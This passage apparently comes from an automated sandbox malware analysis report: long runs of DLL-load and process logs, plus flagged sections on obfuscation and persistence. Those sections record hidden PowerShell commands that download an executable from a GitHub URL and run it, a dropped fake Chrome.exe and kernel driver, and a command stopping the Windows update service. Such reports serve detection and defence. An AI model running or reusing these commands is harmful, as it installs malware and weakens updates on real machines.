            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
            Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
            Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\explorer.exeSection loaded: userenv.dll
            Source: C:\Windows\explorer.exeSection loaded: cryptbase.dll
            Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
            Source: C:\Windows\explorer.exeSection loaded: rsaenh.dll
            Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
            Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
            Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
            Source: C:\Windows\explorer.exeSection loaded: mswsock.dll
            Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
            Source: C:\Windows\explorer.exeSection loaded: napinsp.dll
            Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dll
            Source: C:\Windows\explorer.exeSection loaded: wshbth.dll
            Source: C:\Windows\explorer.exeSection loaded: nlaapi.dll
            Source: C:\Windows\explorer.exeSection loaded: winrnr.dll
            Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: amsi.dll
            Source: C:\Windows\explorer.exeSection loaded: profapi.dll
            Source: C:\Windows\explorer.exeSection loaded: msasn1.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: Chrome.exe, 0000001F.00000003.1667960638.00000147A44F0000.00000004.00000001.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\1348.exe'"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\1348.exe'"Jump to behavior
            Source: 1348.exe.3.drStatic PE information: section name: .00cfg
            Source: Chrome.exe.6.drStatic PE information: section name: .00cfg
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF8880100BD pushad ; iretd 3_2_00007FF8880100C1
            Source: C:\Windows\System32\conhost.exeCode function: 47_2_0000000140001394 push qword ptr [0000000140009004h]; ret 47_2_0000000140001403

            Persistence and Installation Behavior

            barindex
            Source: C:\ProgramData\Chrome.exeFile created: C:\Windows\TEMP\lhaqmlexwhjs.sysJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\1348.exeFile created: C:\ProgramData\Chrome.exeJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\1348.exeJump to dropped file
            Source: C:\ProgramData\Chrome.exeFile created: C:\Windows\Temp\lhaqmlexwhjs.sysJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\1348.exeFile created: C:\ProgramData\Chrome.exeJump to dropped file
            Source: C:\ProgramData\Chrome.exeFile created: C:\Windows\Temp\lhaqmlexwhjs.sysJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\1348.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
